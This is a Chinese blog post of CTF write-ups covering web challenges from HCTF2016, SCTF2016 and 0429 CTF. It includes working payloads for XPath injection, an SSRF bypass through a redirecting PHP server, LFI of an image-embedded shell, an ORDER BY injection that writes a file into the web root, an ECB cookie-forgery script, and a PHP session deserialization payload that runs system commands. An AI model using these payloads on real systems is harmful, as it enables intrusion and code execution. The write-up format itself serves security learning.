近期CTF相关总结

记录下最近CTF题目中的相关技术,CTF比赛越来越多了。

HCTF2016

injection (xpath injection)

xpath注入题目,源码之后得到是这样的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
if(file_exists('t3stt3st.xml')) {
$xml = simplexml_load_file('t3stt3st.xml');
$user=$_GET['user'];
$user=str_replace($re, ' ', $user);
// $user=str_replace("'", "&apos", $user);
$query="user/username[@name='".$user."']";

$ans = $xml->xpath($query);
foreach($ans as $x => $x_value)
{
echo $x.": " . $x_value;
echo "<br />";
}
}

xpath语法:http://www.w3school.com.cn/xpath/xpath_syntax.asp
xpath注入:http://blog.csdn.net/yefan2222/article/details/7227932 关键在于:

1
2
3
4
5
|符号相当于sqli中的union注入。  

/bookstore/* 选取 bookstore 元素的所有子元素。
//* 选取文档中的所有元素。
//title[@*] 选取所有带有属性的 title 元素。

于是有了以下payload,显示出所有的节点:

1
?user=']|//*|//*['

可以看做执行了以下查询,即可注入成功:

1
user/username[@name='  ']|//*|//*['  ']"

Hack my net (SSRF)

根据题目可能会想到去内网,测试SSRF。首先,访问得到两个信息: 想办法访问得到:http://localareanet/all.conf中的数据。
参考这篇SSRF的绕过技巧:http://www.wooyun.org/bugs/wooyun-2015-099135 先测试是否可以访问指定ip:

1
http://120.26.224.102:25045/ea57f09ea421245047b86eaba834fae1/?u=http://nohackair.net:80@121.42.175.111/test.css

可以得到css文件: 且有访问记录:

1
120.26.224.102:63861 [200]: /test.css

这时,使用php进行代理转发,试试。

编写php进行转发请求

这是关键思路,因为如果Content-Type不是text/css,会报501错误。测试可以:

1
2
3
php -S 0.0.0.0:8080

header('Content-Type:text/css;location:http://121.42.175.111:8080/test.css');

访问:?u=http://nohackair.net:80@121.42.175.111:8080/1.php,然后进行内网访问。于是修改为:

1
header('Content-Type:text/css;Location:http://localareanet/all.conf');

成功获取信息:

SCTF2016

Homework

  • 存在LFI
  • 存在文件上传点,但是经过了imagecreatefrom***函数重写图片文件。

但是gif图片处理后,有的部分是不变的。
http://www.freebuf.com/articles/web/54086.html 于是可以上传图片,然后包含图片即可作为shell。

  • 有个坑:

flag不在db中,可以读取文件源码。
服务器禁用掉了phpinfo等大量函数。遍历目录最终找到了php的glob函数。payload如下:

1
2
3
4
5
6
7
8
9
10
11
12
http://homework.sctf.xctf.org.cn/homework.php?homework=upload/673522368.gif

c=echo "<br />**********<br />";
foreach (glob("*") as $filename) {
echo "$filename size " . filesize($filename) . "\n";
}

echo "<br />**********<br />";

http://homework.sctf.xctf.org.cn/4ff692fb12aa996e27f0a108bfc386c2

SCTF{g00d_Good_Stu6y}

总结:

  1. 处理过后的图片,会有部分没有改变的部分。
  2. LFI 包含 图片,形成一个shell
  3. shell限制了太多功能,最后找到glob函数进行遍历目录。。。。。。

参考链接: http://php.net/manual/en/function.glob.php
http://drops.wooyun.org/tips/3978 http://www.freebuf.com/articles/web/54086.html
https://www.secgeek.net/bookfresh-vulnerability/

sycshell

这题过后看了看,有些技术记录下: http://58.213.63.27:61180/

  • 修改host,访问:

查看源码得到如下:

1
<!-- 内部系统资料:http://sycshell.sycsec.com:61180/ -->

修改hosts:

1
58.213.63.27    sycshell.sycsec.com

访问: http://sycshell.sycsec.com:61180/

  • jother编码解密

查看源码可以看到有jother加密的js代码,网上找工具:

1
2
3
https://github.com/dNetGuru/JSUNFuck/releases

PS E:\pentest\tools\jother_decode> .\JSUNFuck.exe .\test.txt

解密得到:

1
if(1==2){var tip="/W0Ca1N1CaiBuDa0/read.php?f=index";}else{alert(/No Tip/);})()

访问:http://sycshell.sycsec.com:61180/W0Ca1N1CaiBuDa0/read.php?f=index 得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
show_source(__FILE__);
$pass = @$_GET['pass'];
$a = "syclover";

strlen($pass) > 15 ? die("Don't Hack me!") : "";

if(!is_numeric($pass) || preg_match('/0(x)?|-|\+|\s|^(\.|\d).*$/i',$pass)){
die('error');
}

if($pass == 1 && $a[$pass] === "s"){
$file = isset($_GET['f']) ? $_GET['f'].'.php' : 'index.php';
@include $file;
}
  • 代码审计,绕过限制

绕过方法值得学习:

1
http://sycshell.sycsec.com:61180/W0Ca1N1CaiBuDa0/read.php?f=index&&pass=%0b.1e1

参考链接:

1
2
3
4
https://www.sco4x0.com/archives/sctf-2016.html

http://zone.wooyun.org/content/23961
http://zone.wooyun.org/content/24075

查看phpinfo,发现有waf.php:

1
2
3
http://58.213.63.27:61180/phpinfo.php

auto_prepend_file /home/wwwroot/waf.php /home/wwwroot/waf.php

读取waf.php 文件内容:

1
2
3
4
5
6
http://sycshell.sycsec.com:61180/W0Ca1N1CaiBuDa0/read.php?f=php://filter/convert.base64-encode/resource=/home/wwwroot/waf&&pass=%0B.1e1

<?php
if(isset($_GET['f']) && preg_match("/zip|phar/",$_GET['f'],$array)){
die("SycWaf: Don't Hack me!");
}
  • phpinfo + lfi 上传shell

这部分之后,详细看一看,总结下。

0429 CTF

web1

  • 通过cookie加密,需要破解这个加密,使uid为6.

限制:

  • 注册的用户名和密码只允许三位数以上。

破解思路为: http://www.freebuf.com/news/special/56506.html 步骤:

1
2
3
aaaaaaaaaaaaaaaa 加密后为: GL209w8nYzcGE05CFQU2kA==  
aaaaaaaaaaaaaaaa1 加密后为: *******
base64解码后,可以看出前1616进制数据一样,将后面数据base64编码即可。

代码为:

1
2
3
def getCookie(uid_cookie):
tmp = base64.b64decode(urllib.unquote(uid_cookie))
return urllib.quote(base64.b64encode(tmp[16:]))

全部python程序为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import requests
from requests.auth import HTTPBasicAuth
import sys
import base64
import urllib

session = requests.Session()

def getCookie(uid_cookie):
tmp = base64.b64decode(urllib.unquote(uid_cookie))
return urllib.quote(base64.b64encode(tmp[16:]))



def go(low,high):

for i in range(low,high):

url_1 = "http://120.27.156.171/index.php?action=action&mod=register"
#username=admin1&password=123456789dasdas

post_data = {'username':'aaaaaaaaaaaaaaaa'+str(i),'password':'123456789dasdas'}

headers = {"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.5",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive"}
response = session.post(url_1, headers=headers,data=post_data)
#print response.text

url_2 = "http://120.27.156.171/index.php?action=action&mod=login"
response = session.post(url_2, headers=headers,allow_redirects=False,data=post_data)
#print response.text
#print response.headers
#print response.cookies['username']
uid_cookie = response.cookies['username']
#uid = response.cookies['uid']
#print uid
#print uid_cookie

uid = getCookie(uid_cookie)
print "uid" + ":" + uid

cookies = {'uid':uid,'username':'13FqE9LbOVXK1HDHrE5R0w%3D%3D'}
#print cookies

url_3 = "http://120.27.156.171/index.php?action=view&mod=index"
response = session.get(url_3, headers=headers,cookies=cookies)
#print response.text
res_text = response.text
res = res_text.find("Hello guest.");
print str(i) + ":" + str(res)
#print res_text
if res != 849:
print res_text
break;


if __name__ == '__main__':
go(int(sys.argv[1]),int(sys.argv[2]));

运行python anheng_web1.py 0 100得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
uid:fuyAU3Nwc2bUCp1e0Zzu1w%3D%3D
0:849
uid:1jpbdzOuTYfkWAXATq%2BZ3g%3D%3D
1:849
uid:M29zL6gcxfM4qYbXMerslw%3D%3D
2:849
uid:jEixf/V/%2BxwafdRfqKL9eg%3D%3D
3:849
uid:kJ7XlgcipAf3235vF5wE1Q%3D%3D
4:849
uid:gaI5Y%2Bm%2B4/2VDJmcfNFL2w%3D%3D
5:849
uid:q5gLEAAP77TBeKxIBh2pgw%3D%3D
6:-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Home</title>
</head>
<body>
<p>
<a href="./index.php?action=view&mod=logout&1460965977">Logout</a>
</p>
<p>
<span>Hi admin. </span>
<span>(Administrator)</span><br>
flag{1284dc540c427d9b02ef5e0956e95489} </p>
</body>
</html>

web2

  • 存在order by注入攻击漏洞

将数据库数据导入文件:

1
http://120.27.145.45/index.php?action=view&mod=index&by=age` AS DECIMAL) desc into outfile '/var/www/html/upload/evil_my_123.php'#

注意:

  • upload目录才可写。
  • 拼接payload

参考学习order by注入:
http://www.jinglingshu.org/?p=10105
http://joychou.org/index.php/web/SQL-Injections-in-MySQL-LIMIT-clause.html

web3

php session注入,参考: PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患 https://bugs.php.net/bug.php?id=71101 http://php.net/manual/zh/session.upload-progress.php 构造反序列化对象为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php

require_once("./class.php");

$foo3 = new foo3();
$foo3->varr = "echo system('ls ./');";

$foo2 = new foo2();
$foo2->obj = $foo3;

$foo1 = new foo1();
$foo1->varr = $foo2;

$ser = serialize($foo1);
echo $ser."\n";
echo str_replace("\"","\\\"",$ser);
?>
  • 构造的上传html文件为:

    1
    2
    3
    4
    5
    <form action="http://120.27.156.224/phpinfo.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="ryat" />
    <input type="file" name="file" />
    <input type="submit" />
    </form>
  • 改变其PHP_SESSION_UPLOAD_PROGRESS属性,如下:

  • 注意加上|注入。

    1
    |O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:21:"echo system('ls ./');";}}}
  • 先提交到phpinfo.php,还要访问以下index.php才能得到结果:

  • 每次攻击,要重新生成序列化数据,因为字符串长度不一样。

    1
    |O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:23:"echo system('ls /var');";}}}

    执行代码长度需要改变:s:23:"echo system('ls /var');"与前面测试的s:21:"echo system('ls ./');"不一样。 21变成了23。

  • 最后payload:

    |O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:79:"echo system('cat /var/www/html/flag_Z11O65g9uWbBUokxujdkc763h83hhZUuzoXe.php');";}}}
文章作者: angelwhu
文章链接: https://www.angelwhu.com/paper/2016/05/20/recent-ctf-related-summary/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 angelwhu_blog